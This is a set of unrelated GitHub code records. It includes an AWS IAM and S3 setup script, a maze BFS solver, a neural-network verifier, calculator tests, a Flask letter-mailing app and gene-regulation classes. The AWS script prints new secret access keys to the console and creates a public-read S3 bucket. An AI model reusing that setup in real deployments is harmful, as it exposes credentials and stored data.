PermissionsBoundary = properties.iamUsers[id]['boundary'],\n Tags=[\n {\n 'Key': 'Purpose',\n 'Value': 'MigrationProcess'\n }\n ]\n )\n \n\n data = client.create_access_key(\n UserName=properties.iamUsers[id]['name']\n )\n\n #putParameter( Account_ID, 'UserName', data['AccessKey']['UserName'], 'false')\n putParameter(data['AccessKey']['UserName'] + '/AccessKeyId', data['AccessKey']['AccessKeyId'], 'false')\n putParameter(data['AccessKey']['UserName'] + '/SecretAccessKey', data['AccessKey']['SecretAccessKey'], 'True')\n\n print('++++++++++++++++++')\n print(properties.iamUsers[id]['name'], 'created')\n print(data['AccessKey']['UserName'])\n print(data['AccessKey']['AccessKeyId'])\n print(data['AccessKey']['SecretAccessKey'])\n\n\n## Create S3 bucket \n## This bucket is where CFN and lambda functions are uploaded for setup process\n## Bucket has region code so lamda will work (DO NOT CHANGE it will break stuff)\n## Bucket has public ACL due to lambda deploy (DO NOT change it will break stuff)\n## Nothing confidential is included in this bucket\n\ndef createS3bucket():\n\n client = boto3.client('s3')\n\n bucket_name = {\n client.create_bucket(\n ACL='public-read',\n Bucket = Account_ID + '-migration' + '-' + Region,\n )\n }\n print(bucket_name)\n putParameter('Bucket_Name', bucket_name, 
'false')\n\n\naddIAMusers()\ncreateS3bucket()","repo_name":"DanielM70/migration_setup","sub_path":"setupRequirements.py","file_name":"setupRequirements.py","file_ext":"py","file_size_in_byte":2299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"2008443964","text":"from collections import deque\n\ndef solution(maps):\n n = len(maps)\n m = len(maps[0])\n \n # 시작 지점(S), 레버 위치(L) 파악\n for x in range(n):\n for y in range(m):\n if maps[x][y] == 'S':\n s_pos = [x, y]\n elif maps[x][y] == 'L':\n l_pos = [x, y]\n \n # 시작 지점에서 레버로 이동\n StartToLever = bfs(s_pos, 'L', maps)\n if StartToLever == -1:\n return -1\n # 레버에서 출구로 이동\n LeverToExit = bfs(l_pos, 'E', maps)\n if LeverToExit == -1:\n return -1\n return StartToLever + LeverToExit\n \n \ndef bfs(start_pos:list, target_mark:str, arr: list):\n start_x = start_pos[0]\n start_y = start_pos[1]\n \n n = len(arr)\n m = len(arr[0])\n visited = [[False for _ in range(m)] for _ in range(n)]\n \n queue = deque([[start_x, start_y, 0]])\n while queue:\n x, y, count = queue.popleft()\n visited[x][y] = True\n \n if arr[x][y] == target_mark:\n return count\n \n if 0 <= x-1 and visited[x-1][y] == False:\n if arr[x-1][y] != 'X':\n queue.append([x-1, y, count + 1])\n visited[x-1][y] = True\n if 0 <= y-1 and visited[x][y-1] == False:\n if arr[x][y-1] != 'X':\n queue.append([x, y-1, count + 1])\n visited[x][y-1] == True\n if x+1 < n and visited[x+1][y] == False:\n if arr[x+1][y] != 'X':\n queue.append([x+1, y, count + 1])\n visited[x+1][y] = True\n if y+1 < m and visited[x][y+1] == False:\n if arr[x][y+1] != 'X':\n queue.append([x, y+1, count + 1])\n visited[x][y+1] = True\n return -1","repo_name":"jst0951/CodingTest","sub_path":"프로그래머스/2/159993. 미로 탈출/미로 탈출.py","file_name":"미로 탈출.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"26921583065","text":"import numpy as np\nimport os\nimport sys\n\nif(len(sys.argv)<2):\n print(\"Syntax: check_nev.py file\")\n\n\n\nfor i in range(1,len(sys.argv)):\n infile=sys.argv[i]\n \n if(not (os.path.exists(infile))):\n print(\"Error, \"+infile+\" does not exist!\\n\")\n exit(1)\n else:\n print(\"Working on file: \"+infile)\n with open(infile,\"rb\") as fin:\n nevents=np.fromfile(fin,dtype=np.int64,count=1)[0]\n if(i==1):\n nref=nevents\n print(\"Reference number of events is: \"+str(nevents))\n else:\n if(nevents!=nref):\n print(\"Error, \"+infile+\" has a different number of events: \"+str(nevents)+\"\\n\")\n exit(1)\nprint(\"Check completed, all fine!\") \n","repo_name":"gabriele-inghirami/coarse_graining","sub_path":"utilities/check_nev.py","file_name":"check_nev.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"23455735955","text":"from netver.backend.ProVe import ProVe\nimport numpy as np; import tensorflow as tf\n\n\nclass CompleteProVe( ProVe ):\n\n\t\"\"\"\n\tA class that implements Complete ProVe, a verification tool based on the interval propagation. \n\tThis tool is based on a parallel implementation of the interval analysis on GPU that increase the performance. \n\tThe main difference between ProVe and Complete ProVe is that the second can also formally verify a violation and not only\n\twhen a property is respected. 
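The maze `bfs` a few records up repeats four nearly identical neighbor blocks, and its left-neighbor branch writes `visited[x][y-1] == True`, a comparison where an assignment was intended, so that cell can be enqueued repeatedly. A direction-vector sketch that removes the duplication (standalone; same convention that `'X'` marks a wall):

```python
from collections import deque

def bfs(grid, start, target):
    """Shortest step count from `start` to the first cell equal to `target`."""
    n, m = len(grid), len(grid[0])
    visited = [[False] * m for _ in range(n)]
    queue = deque([(start[0], start[1], 0)])
    visited[start[0]][start[1]] = True
    while queue:
        x, y, dist = queue.popleft()
        if grid[x][y] == target:
            return dist
        for dx, dy in ((-1, 0), (1, 0), (0, -1), (0, 1)):
            nx, ny = x + dx, y + dy
            if 0 <= nx < n and 0 <= ny < m and not visited[nx][ny] and grid[nx][ny] != 'X':
                visited[nx][ny] = True   # mark on enqueue, exactly once
                queue.append((nx, ny, dist + 1))
    return -1

assert bfs(["SOL", "OXO", "OOE"], (0, 0), 'E') == 4
```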
This results allows Complete ProVe to compute the vaiolation rate, the percentage of the input domain \n\tthat cause a violation, this tool does not terimante as soon as it found a counterexample, but seraches an all the input-domain to prove (or deny) \n\tthe proeprty at each point bound-wise (see [b] for the details). \n\t[a] coming soon ....\n\n\tAttributes\n\t----------\n\t\tP : list\n\t\t\tinput domain for the property in the form 'positive', each output from a point in this domain must be greater than zero.\n\t\t\t2-dim list: a list of two element (lower_bound, upper_bound) for each input nodes\n\t\tnetwork : tf.keras.Model\n\t\t\ttensorflow model to analyze, the model must be formatted in the 'tf.keras.Model(inputs, outputs)' format\n\t\tdual_network: tf.keras.Model\n\t\t\tthe dual netowrk is built to deny the properties, is the negation of the main netowrk, a property is violated when \"at least\n\t\t\tONE output of the dual netowrk is greater than zero. It also works in \"reverse\" mode, a property is violated when \n\t\t\t\"ALL the outputs of the dual netowrk are greater than zero\"\n\t\tsuper: super()\n\t\t\tthis class is inherited from netver.backend.ProVe, all the paramters of the parent class are inherited in this class\n\n\tMethods\n\t-------\n\t\tverify( verbose )\n\t\t\tmethod that formally verify the property P on the ginve network\n\t\"\"\"\n\n\tdef __init__(self, network, P, dual_network, **kwargs):\n\n\t\t\"\"\"\n\t\tConstructor of the class, also calls the super class constructor ProVe\n\n\t\tParameters\n\t\t----------\n\t\t\tnetwork : tf.keras.Model\n\t\t\t\ttensorflow model to analyze, the model must be formatted in the 'tf.keras.Model(inputs, outputs)' format\n\t\t\tP : list\n\t\t\t\tinput domain for the property in the form 'positive', each output from a point in this domain must be greater than zero.\n\t\t\t\t2-dim list: a list of two element (lower_bound, upper_bound) for each input nodes\n\t\t\"\"\"\n\n\t\tsuper().__init__(network, P, **kwargs)\n\t\tself.dual_network = dual_network\n\n\n\tdef verify( self, verbose ):\n\n\t\t\"\"\"\n\t\tMethod that perform the formal analysis. 
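The `verify` loop defined here leans on `_split` from the parent ProVe class to refine unknown sub-domains each cycle (iterative refinement). The library's own splitting code is not shown in this record, but one plausible step on the flattened `(N, 2 * n_inputs)` areas matrix is to bisect every box along its widest input; the sketch below is my illustration of that idea, not ProVe's implementation:

```python
import numpy as np

def bisect_boxes(areas: np.ndarray) -> np.ndarray:
    """areas: (N, 2*d) rows of [lo_0, hi_0, ..., lo_{d-1}, hi_{d-1}] -> (2N, 2*d)."""
    boxes = areas.reshape(areas.shape[0], -1, 2)
    widths = boxes[:, :, 1] - boxes[:, :, 0]
    out = []
    for box, axis in zip(boxes, widths.argmax(axis=1)):
        mid = (box[axis, 0] + box[axis, 1]) / 2.0
        left, right = box.copy(), box.copy()
        left[axis, 1] = mid    # lower half along the widest input
        right[axis, 0] = mid   # upper half
        out.extend([left, right])
    return np.array(out).reshape(-1, areas.shape[1])

doubled = bisect_boxes(np.array([[0.0, 1.0, 0.0, 0.5]]))
print(doubled)  # two boxes: x in [0, .5] and [.5, 1], y untouched
```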
When the solver explored and verify all the input domain it returns the\n\t\tviolation rate, when the violation rate is zero we colcude the the proeprty is fully respected, i.e., SAT\n\n\t\tParameters\n\t\t----------\n\t\t\tverbose : int\n\t\t\t\twhen verbose > 0 the software print some log informations\n\n\t\tReturns:\n\t\t--------\n\t\t\tsat : bool\n\t\t\t\ttrue if the proeprty P is verified on the given network, false otherwise\n\t\t\tinfo : dict\n\t\t\t\ta dictionary that contains different information on the process, the \n\t\t\t\tkey 'counter_example' returns the input configuration that cause a violation\n\t\t\t\tkey 'exit_code' returns the termination reason (timeout or completed)\n\t\t\t\tkey 'violation_rate' returns the value of the vilation rate as a percentage of the input domain\n\t\t\"\"\"\n\n\t\t# Flatten the input domain to aobtain the areas matrix to simplify the splitting\n\t\tareas_matrix = np.array([self.P.flatten()])\n\n\t\t# Array with the number of violations for each depth level\n\t\tviolation_rate_array = []\n\t\t\n\t\t# Loop until all the subareas are eliminated (verified) or a counter example is found\n\t\tfor cycle in range(self.time_out_cycle):\n\n\t\t\t# Print some monitoring information\n\t\t\tif verbose > 0: print( f\"Iteration cycle {cycle:3d} of {self.time_out_cycle:3d} (checked {100-self.unchecked_area:5.3f}%)\" )\n\n\t\t\t# Eventually round the areas matrix\n\t\t\tif self.rounding is not None: areas_matrix = np.round(areas_matrix, self.rounding)\n\t\t\t\n\t\t\t# Reshape the areas matrix in the form (N, input_number, 2)\n\t\t\ttest_domain = areas_matrix.reshape(-1, self.P.shape[0], 2)\n\n\t\t\t# Call the propagation method to obtain the output bound from the input area (primal and dual)\n\t\t\ttest_bound = self._propagation_method( test_domain, self.network )\n\t\t\ttest_bound_dual = self._propagation_method( test_domain, self.dual_network )\n\n\t\t\t# Call the verifier (N(x) >= 0) on all the subareas\n\t\t\tunknown_id, violated_id, proved_id = self._complete_verifier( test_bound, test_bound_dual )\n\n\t\t\t# Call the updater for the checked area\n\t\t\tself._update_unchecked_area( cycle, proved_id[0].shape[0]+violated_id[0].shape[0] )\n\t\t\t\n\t\t\t# Update the violation rate array to compute the violation rate\n\t\t\tviolation_rate_array.append( len(violated_id[0]) )\n\n\t\t\t# Iterate only on the unverified subareas\n\t\t\tareas_matrix = areas_matrix[unknown_id]\n\n\t\t\t# Exit check when all the subareas are verified\n\t\t\tif areas_matrix.shape[0] == 0: break\n\n\t\t\t# Exit check when the checked area is below the timout threshold\n\t\t\tif self.unchecked_area < self.time_out_checked:\n\t\t\t\t# Update the violation rate array adding all the remaining elements\n\t\t\t\tviolation_rate_array[-1] += areas_matrix.shape[0]\n\t\t\t\tbreak\n\n\t\t\t# Split the inputs (Iterative Refinement)\n\t\t\tareas_matrix = self._split( areas_matrix )\n\n\t\t# Check if the exit reason is the time out on the cycle\n\t\tif cycle >= self.time_out_cycle:\n\t\t\t# return UNSAT with the no counter example, specifying the exit reason\n\t\t\treturn False, { \"counter_example\" : None, \"exit_code\" : \"cycle_timeout\" }\n\n\t\t# Compute the violation rate, multipling the depth for the number for each violation\n\t\t# and normalizing for the number of theoretical leaf\n\t\tviolations_weigth = sum( [ 2**i * n for i, n in enumerate(reversed(violation_rate_array))] ) \n\t\tviolation_rate = violations_weigth / 2**(len(violation_rate_array)-1) * 100 \n\n\t\t# All the input are 
verified, return SAT with no counter example\n\t\treturn (violation_rate == 0), { \"violation_rate\": violation_rate }\n\n\n\n\tdef _complete_verifier( self, test_bound, test_bound_dual ):\n\t\t\n\t\t\"\"\"\n\t\tMethod that verify the property on a list of the computed (or sampled in semi-formal mode) output bound.\n\n\t\tParameters\n\t\t----------\n\t\t\ttest_bound : list\n\t\t\t\tthe output bound expressed as a 3-dim matrix. (a) a list of list for each splitted domain;\n\t\t\t\t(b) a list of bound for each input node and (c) a list of two element for the node, lower and upper\n\t\t\ttest_bound_dual : list\n\t\t\t\tsame as test_bound but for the dual network\n\n\t\tReturns:\n\t\t--------\n\t\t\tunknown_id : list\n\t\t\t\tlist of integer with the index of the bound that dows not respect the property and require\n\t\t\t\tfurther investigations\n\t\t\tviolated_id : list\n\t\t\t\tlist of integer with the index of the bound that violated the give property\n\t\t\tproved_id : list\n\t\t\t\tlist of integer with the index of the bound that respect the give property\n\t\t\"\"\"\n\n\t\t# Check the property in standard and reverse mode for both a violation and a proof. \n\t\t# To prove the property, in the first case every bound must be greater than zero,\n\t\t# in the latter at least one bound must be greater than zero. \n\t\t# To deny the property, in the first case at least one bound must be greater than zero,\n\t\t# in the latter every one bound must be greater than zero. \n\t\tif not self.reversed:\n\t\t\tproved_bound = np.all(test_bound[:, :, 0] >= 0, axis=1) # Property proved here!\n\t\t\tviolated_bound = np.any(test_bound_dual[:, :, 0] > 0, axis=1) # Property violated here!\n\t\telse:\n\t\t\tproved_bound = np.any(test_bound[:, :, 0] > 0, axis=1) # Property proved here!\n\t\t\tviolated_bound = np.all(test_bound_dual[:, :, 0] >= 0, axis=1) # Property violated here!\n\n\t\t# Create a mask for the unknown, when a property is neither proved or vioalted\n\t\tunknown_mask = np.logical_or(proved_bound, violated_bound)\n\n\t\t# Find the unknown and proved index with the built-in numpy function\t\t\n\t\tunknown_id = np.where( unknown_mask == False )\n\t\tviolated_id = np.where( violated_bound == True )\n\t\tproved_id = np.where( proved_bound == True )\n\n\t\t#\n\t\treturn unknown_id, violated_id, proved_id\n\n","repo_name":"d-corsi/NetworkVerifier","sub_path":"netver/netver/backend/CompleteProve.py","file_name":"CompleteProve.py","file_ext":"py","file_size_in_byte":7956,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"51"} +{"seq_id":"31529816676","text":"import unittest\nfrom CalculatorDB.CaclulatorDB import CalculatorDB\n\n\nclass Add(unittest.TestCase):\n def setUp(self):\n try:\n self.db = CalculatorDB(database=\"test.db\", clear=True)\n except Exception:\n self.skipTest(\"Database not found\")\n\n def test_add_example_str_str(self):\n self.assertTrue(self.db.add_example(\"1 2 +\", \"3\"))\n\n def test_add_example_str_int(self):\n with self.assertRaises(ValueError):\n self.db.add_example(\"1 2 +\", 3)\n\n def test_add_example_str_float(self):\n with self.assertRaises(ValueError):\n self.db.add_example(\"1 2 +\", 3.4)\n\n def test_add_example_list_int(self):\n with self.assertRaises(ValueError):\n self.db.add_example(\"1 2 +\", [3, 3])\n\n def test_add_example_str_tuple(self):\n with self.assertRaises(ValueError):\n self.db.add_example(\"1 2 +\", (3, 3))\n\n def test_add_example_str_none(self):\n with self.assertRaises(ValueError):\n 
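The violation rate computed at the end of `verify` weights each depth's violated-box count by 2^i (counting i from the deepest level, where one box is one leaf) and normalizes by the 2^(depth-1) theoretical leaves. A worked check of that formula on made-up counts:

```python
# Violation-rate formula from verify(), on fabricated per-depth counts.
violation_rate_array = [0, 1, 0]   # violated boxes found at depths 0, 1, 2

weight = sum(2 ** i * n for i, n in enumerate(reversed(violation_rate_array)))
rate = weight / 2 ** (len(violation_rate_array) - 1) * 100

# One violated box at depth 1 covers 2 of the 4 depth-2 leaves -> 50%.
assert weight == 2 and rate == 50.0
```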
self.db.add_example(\"1 2 +\", None)\n\n\nclass Contains(unittest.TestCase):\n def setUp(self):\n try:\n self.db = CalculatorDB(database=\"test.db\", clear=True)\n except:\n self.skipTest(\"Database not found\")\n\n def test_contains_example_1(self):\n self.db.add_example(\"1 2 +\", \"3\")\n examples = self.db.get_all_examples()\n contains = False\n for example in examples:\n if example[0] == \"1 2 +\" and example[1] == \"3\":\n contains = True\n break\n self.assertTrue(contains)\n\n def test_contains_example_many(self):\n examples = [[\"1 2 +\", \"3\"], [\"1 3 +\", \"4\"], [\"1 4 +\", \"5\"]]\n contains_arr = [False, False, False]\n self.db.add_example(examples[0][0], examples[0][1])\n self.db.add_example(examples[1][0], examples[1][1])\n self.db.add_example(examples[2][0], examples[2][1])\n db_examples = self.db.get_all_examples()\n for example in db_examples:\n for i in range(3):\n if example[0] == examples[i][0] and example[1] == examples[i][1]:\n contains_arr[i] = True\n break\n contains = contains_arr[0] and contains_arr[1] and contains_arr[2]\n self.assertTrue(contains)\n","repo_name":"Vemar45/PythonLab","sub_path":"CalculatorDB/IntegrationTestBD_Calculator.py","file_name":"IntegrationTestBD_Calculator.py","file_ext":"py","file_size_in_byte":2288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"41708755156","text":"# ~*~ coding: utf-8 ~*~\n'''Main App\n\nThis module contains the logic for rendering pages of the webapp via Flask's routing engine\n'''\n\nimport lob\nimport util\nfrom flask import Flask, render_template, request\n\napp = Flask(__name__)\nlob.api_key = 'LOB_API_KEY'\nlob.api_version = 'LOB_API_VERSION'\n\n@app.route('/')\ndef index():\n '''\n Renders the home page\n '''\n return render_template('index.html', states=sorted(util.STATES))\n\n\n@app.route('/build_letter', methods=['POST'])\ndef build_letter():\n '''\n This is the page that gets rendered when user submits information for creating a letter\n '''\n resp = util.get_representative(request.form['address1'])\n\n # Handle Civic API errors\n if resp.status_code != 200:\n # Something went wrong with the Google Civics query, render error page\n return render_error_page(resp.json(), 'civic')\n\n # Get the recipient's information\n rep = find_house_member(resp)\n\n # JSON response of letter via Lob\n letter = create_letter(request.form, rep)\n\n # Handle Lob Letter API errors\n if not isinstance(letter, lob.Letter):\n return render_error_page(letter.http_status, 'lob')\n\n # Variable interpolations for the letter\n letter_file = letter['url']\n state = '+'.join(util.STATES[request.form['state']].split()) # Ensure that the get query encodes two-word states correctly\n\n return render_template('build_letter.html', user_data=request.form, resp_data=resp.json(),\n letter_file=letter_file, state=state)\n\n\ndef render_error_page(error, api):\n '''\n Renders an error page that upon a faulty response (JSON) from an API query\n '''\n if api == 'civic':\n error_code = error['error']['code']\n error_msg = util.parse_civic_error(\n error['error']['errors'][0]['reason'])\n return render_template('error.html', code=error_code, msg=error_msg)\n else:\n error_msg = util.parse_lob_error(error)\n return render_template('error.html', code=error, msg=error_msg)\n\n\ndef find_house_member(civics_data):\n '''\n Given the response from the Civics query, return a member of the House of Representatives\n '''\n # I'm positive there's not a simple way to query by official rank :(\n 
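The `Add` test case above spends one method per invalid result type; `unittest.subTest` folds them into a single loop while still reporting each failing type on its own. A sketch against the same `CalculatorDB` interface (module path spelled as in the record):

```python
import unittest
from CalculatorDB.CaclulatorDB import CalculatorDB

class AddInvalidTypes(unittest.TestCase):
    def setUp(self):
        self.db = CalculatorDB(database="test.db", clear=True)

    def test_add_example_rejects_non_str(self):
        # Each bad value is reported as its own subtest on failure.
        for bad in (3, 3.4, [3, 3], (3, 3), None):
            with self.subTest(result=bad):
                with self.assertRaises(ValueError):
                    self.db.add_example("1 2 +", bad)
```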
for official in civics_data.json().get('officials'):\n if 'urls' in official:\n for url in official['urls']:\n if '.house.gov' in url:\n return official\n\n\ndef create_letter(sender, recipient):\n '''\n Create letter using Lob's API given sender and recipient data\n '''\n letter = None\n\n try:\n letter = lob.Letter.create(\n description='Letter to ' + sender['name'] + '\\'s Representative',\n from_address={\n 'name': sender['name'],\n 'address_line1': sender['address1'],\n 'address_line2': sender['address2'],\n 'address_city': sender['city'],\n 'address_state': sender['state'],\n 'address_zip': sender['zip'],\n 'address_country': 'US'\n },\n to_address={\n 'name': recipient['name'],\n 'address_line1': recipient['address'][0]['line1'],\n 'address_city': recipient['address'][0]['city'],\n 'address_state': recipient['address'][0]['state'],\n 'address_zip': recipient['address'][0]['zip'],\n 'address_country': 'US'\n },\n\n data={\n 'sender_name': sender['name'],\n 'recipient_name': recipient['name'].split()[1]\n },\n file=util.generate_html(sender['message'].replace('\\n', '
    ')), # textarea adds newlines\n color=True\n )\n return letter\n except Exception as ex:\n return ex\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"trivedi/mail-US-representative","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"36208520309","text":"# -*- coding: utf-8 -*-\n\n\nfrom __future__ import (absolute_import, unicode_literals, print_function)\n\n\n\"\"\"\n==============================\nPyOrganism Regulatory Elements\n==============================\n\n:Authors:\n Moritz Emanuel Beber\n:Date:\n 2012-06-08\n:Copyright:\n Copyright(c) 2012 Jacobs University of Bremen. All rights reserved.\n:File:\n elements.py\n\"\"\"\n\n\n__all__ = [\"Gene\", \"Product\", \"Regulator\", \"TranscriptionFactor\", \"SigmaFactor\",\n \"NucleoidAssociatedProtein\", \"Promoter\", \"TranscriptionUnit\", \"Operon\",\n \"Conformation\", \"clear_memory\"]\n\nimport sys\nimport logging\n\nfrom .. import miscellaneous as misc\nfrom ..base import UniqueBase\n\n\nLOGGER = logging.getLogger(__name__)\nLOGGER.addHandler(misc.NullHandler())\n\n\nclass Gene(UniqueBase):\n\n def __init__(self, unique_id=\"\", name=\"\", bnumber=\"\", synonyms=None,\n position_start=None, position_end=None, strand=None, sequence=None,\n gc_content=None, product=None, regulatory_product=None, **kw_args):\n super(Gene, self).__init__(unique_id=unique_id, **kw_args)\n self.name = name\n self.bnumber = bnumber\n self.synonyms = misc.convert(synonyms, set, set())\n self.position_start = misc.convert(position_start, int)\n self.position_end = misc.convert(position_end, int)\n self.position = (self.position_start, self.position_end)\n self.strand = strand\n self.sequence = sequence\n self.gc_content = misc.convert(gc_content, float)\n self.product = product\n self.regulatory_product = regulatory_product\n self.transcription_units = set()\n self.operons = set()\n\n def __contains__(self, name):\n if name == self.unique_id:\n return True\n elif name == self.name:\n return True\n # need substring test for bnumber for entries with additional info\n elif name == self.bnumber:\n return True\n elif self.synonyms and any(name == syn for syn in self.synonyms if syn):\n return True\n else:\n return False\n\n def get_transcription_units(self):\n return self.transcription_units\n\n def get_operons(self):\n return self.operons\n\n def print_info(self, stream=sys.stdout):\n print(\"ECK12:\", self.unique_id, file=stream)\n print(\"name:\", self.name, file=stream)\n print(\"bnumber:\", self.bnumber, file=stream)\n print(\"synonyms:\", self.synonyms, file=stream)\n print(\"position:\", self.position, file=stream)\n\n\nclass Product(UniqueBase):\n\n def __init__(self, unique_id=\"\", name=\"\", molecular_weight=None,\n isoelectric_point=None, synonyms=None, go=None, coded_from=None,\n **kw_args):\n super(Product, self).__init__(unique_id=unique_id, **kw_args)\n self.name = name\n self.molecular_weight = misc.convert(molecular_weight, float)\n self.isoelectric_point = misc.convert(isoelectric_point, float)\n self.synonyms = misc.convert(synonyms, set, set())\n self.go = go\n self.coded_from = coded_from\n\n def __contains__(self, name):\n if name == self.unique_id:\n return True\n elif name == self.name:\n return True\n elif self.synonyms and any(name == syn for syn in self.synonyms if syn):\n return True\n elif name == self.go:\n return True\n else:\n return False\n\n def 
get_transcription_units(self):\n return set(tu for gene in self.coded_from for tu in gene.transcription_units)\n\n def get_operons(self):\n return set(op for gene in self.coded_from for op in gene.operons)\n\n def print_info(self, stream=sys.stdout):\n print(\"ECK12:\", self.unique_id, file=stream)\n print(\"name:\", self.name, file=stream)\n print(\"synonyms:\", self.synonyms, file=stream)\n print(self.go, file=stream)\n\n\nclass Regulator(UniqueBase):\n\n def __init__(self, unique_id=\"\", name=\"\", synonyms=None, go=None,\n coded_from=None, made_from=None, **kw_args):\n super(Regulator, self).__init__(unique_id=unique_id, **kw_args)\n self.name = name\n self.synonyms = misc.convert(synonyms, set, set())\n self.go = go\n self.coded_from = misc.convert(coded_from, set, set())\n self.made_from = misc.convert(made_from, set, set())\n\n def __contains__(self, name):\n if name == self.unique_id:\n return True\n elif name == self.name:\n return True\n elif not self.synonyms is None and any(name == syn for syn in\\\n self.synonyms if syn):\n return True\n elif name == self.go:\n return True\n else:\n return False\n\n def get_transcription_units(self):\n return set(tu for gene in self.coded_from for tu in gene.transcription_units)\n\n def get_operons(self):\n return set(op for gene in self.coded_from for op in gene.operons)\n\n def print_info(self, stream=sys.stdout):\n print(\"ECK12:\", self.unique_id, file=stream)\n print(\"name:\", self.name, file=stream)\n print(\"synonyms:\", self.synonyms, file=stream)\n print(self.go, file=stream)\n\n\nclass TranscriptionFactor(Regulator):\n\n def __init__(self, unique_id=\"\", conformations=None, **kw_args):\n super(TranscriptionFactor, self).__init__(unique_id=unique_id, **kw_args)\n self.conformations = misc.convert(conformations, set, set())\n\n\nclass SigmaFactor(Regulator):\n\n def __init__(self, unique_id=\"\", **kw_args):\n super(SigmaFactor, self).__init__(unique_id=unique_id, **kw_args)\n\n\nclass NucleoidAssociatedProtein(Regulator):\n\n def __init__(self, unique_id=\"\", **kw_args):\n super(NucleoidAssociatedProtein, self).__init__(unique_id=unique_id,\n **kw_args)\n\n\nclass Conformation(UniqueBase):\n\n def __init__(self, unique_id=\"\", name=\"\", tf=None, state=None,\n conformation_type=None, interaction=None, apo_holo=None, **kw_args):\n super(Conformation, self).__init__(unique_id=unique_id, **kw_args)\n self.name = name\n self.t_factor = tf\n self.final_state = state\n self.type = conformation_type\n self.interaction = interaction\n self.apo_holo = apo_holo\n\n\nclass Promoter(UniqueBase):\n\n def __init__(self, unique_id=\"\", name=\"\", strand=None, pos_1=None,\n sequence=None, sigma_factor=None, note=None, **kw_args):\n super(Promoter, self).__init__(unique_id=unique_id,\n **kw_args)\n self.name = name\n self.strand = strand\n self.pos_1 = misc.convert(pos_1, int)\n self.sigma_factor = misc.convert(sigma_factor, list, list())\n self.sequence = sequence\n self.note = note\n\n def print_info(self, stream=sys.stdout):\n print(\"ECK12:\", self.unique_id, file=stream)\n print(\"name:\", self.name, file=stream)\n\n\nclass TranscriptionUnit(UniqueBase):\n\n def __init__(self, unique_id=\"\", name=\"\", promoter=None, operon=None,\n genes=None, **kw_args):\n super(TranscriptionUnit, self).__init__(unique_id=unique_id,\n **kw_args)\n self.name = name\n self.promoter = promoter\n self.operon = operon\n self.genes = misc.convert(genes, list, list())\n\n def __len__(self):\n return len(self.genes)\n\n def print_info(self, stream=sys.stdout):\n 
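Nearly every constructor in this elements module routes optional arguments through `misc.convert(value, type, default)`; the helper itself is not shown here, but the call sites (`misc.convert(synonyms, set, set())`, `misc.convert(pos_1, int)`) imply roughly this contract. A hypothetical reimplementation, not PyOrganism's actual code:

```python
def convert(value, new_type, default=None):
    """Coerce `value` to `new_type`, falling back to `default` on None or failure."""
    if value is None:
        return default
    try:
        return new_type(value)
    except (TypeError, ValueError):
        return default

assert convert("42", int) == 42
assert convert(None, set, set()) == set()
assert convert(["a", "a"], set, set()) == {"a"}
```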
print(\"ECK12:\", self.unique_id, file=stream)\n print(\"name:\", self.name, file=stream)\n print(\"Genes:\", \", \".join([gene.name if gene.name else \"?\" for gene in self.genes]), file=stream)\n\n\nclass Operon(UniqueBase):\n\n def __init__(self, unique_id=\"\", name=\"\", strand=None, promoters=None, genes=None,\n gene_position_start=None, gene_position_end=None,\n regulation_position_start=None, regulation_position_end=None, **kw_args):\n super(Operon, self).__init__(unique_id=unique_id,\n **kw_args)\n self.name = name\n self.strand = strand\n self.gene_position_start = misc.convert(gene_position_start, int)\n self.gene_position_end = misc.convert(gene_position_end, int)\n self.regulation_position_start = misc.convert(regulation_position_start, int)\n self.regulation_position_end = misc.convert(regulation_position_end, int)\n self.promoters = misc.convert(promoters, set, set())\n self.genes = misc.convert(genes, list, list())\n\n def __len__(self):\n return len(self.genes)\n\n def print_info(self, stream=sys.stdout):\n print(\"ECK12:\", self.unique_id, file=stream)\n print(\"name:\", self.name, file=stream)\n print(\"Genes:\", \", \".join([gene.name if gene.name else \"?\" for gene in self.genes]), file=stream)\n\n\ndef clear_memory():\n Gene.clear()\n Product.clear()\n Regulator.clear()\n TranscriptionFactor.clear()\n SigmaFactor.clear()\n NucleoidAssociatedProtein.clear()\n Conformation.clear()\n Promoter.clear()\n TranscriptionUnit.clear()\n Operon.clear()\n\n","repo_name":"Midnighter/pyorganism","sub_path":"pyorganism/regulation/elements.py","file_name":"elements.py","file_ext":"py","file_size_in_byte":8996,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"72806793438","text":"import objectManager\n\n# [Esquerda Baixo, Direita Baixo, Direita Cima, Esquerda Cima] -> Fecha um quadrado\ncanvas_aux = 0.93\ncanvas = [[-canvas_aux, -canvas_aux], [canvas_aux, -canvas_aux], [canvas_aux, canvas_aux], [-canvas_aux, canvas_aux]]\ncanvas_viewport_coords = list()\n\ninside_window_code = [0, 0, 0, 0]\n\n# 0 = Acima, 1 = Abaixo, 2 = Direita, 3 = Esquerda, 4 = Esq. Topo, 5 = Dir. Topo, 6 = Dir. Baixo, 7 = Esq. 
